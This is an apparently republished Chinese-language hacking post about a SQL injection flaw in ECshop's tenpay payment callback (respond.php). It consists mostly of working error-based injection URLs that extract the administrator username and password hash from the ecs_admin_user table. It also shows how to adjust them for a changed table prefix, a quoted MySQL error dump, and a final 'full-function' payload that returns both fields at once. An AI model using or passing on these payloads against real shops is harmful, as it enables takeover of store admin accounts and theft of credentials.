ECshop 支付方式0day手工注射 EXP漏洞预警 -电脑资料

    ECshop 支付方式0day手工注射的研究

    原EXP为：

    respond.php?code=tenpay&attach=voucher&sp_billno=1 and(select 1 from(select count(*),concat((select

    (select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `ecs`.ecs_admin_user)) from

    information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

    and 1=1

    漏洞具体见：http://www.hackline.net/a/news/ldfb/web/2011/0105/7877.html

    一直无法手工注入得到用户与密码，

ECshop 支付方式0day手工注射 EXP漏洞预警

    经过牛人的指点后，我成功得到的返回用户和密码字段的exp

    暴用户名：

    http://site/respond.php?code=tenpay&attach=voucher&sp_billno=1%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20user_name%20FROM%20ecs_admin_user%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1

    暴密码：

    http://site/respond.php?code=tenpay&attach=voucher&sp_billno=1%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20password%20FROM%20ecs_admin_user%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1

    如果表前缀被改如下所示：

    MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => SELECT log_id FROM `aimeili`.`aml_pay_log` WHERE order_id=1 and(select 1 from(select count(*),concat((select (select (SELECT password FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 AND order_type=1 ) [2] => Array ( [error] => Table 'aimeili.ecs_admin_user' doesn't exist ) [3] => Array ( [errno] => 1146 ) )

    只要修改ecs_admin_user为aml_admin_user即可

    有图有真像

    最后感谢神牛Luc1f3r

    2010-01-30补充

    全功能EXP：

    respond.php?code=tenpay&attach=voucher&sp_billno=1%20and%201=2%20union%20select%201%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28Select%20concat%280x5b,user_name,0x3a,password,0x5d%29%20FROM%20ecs_admin_user%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20%23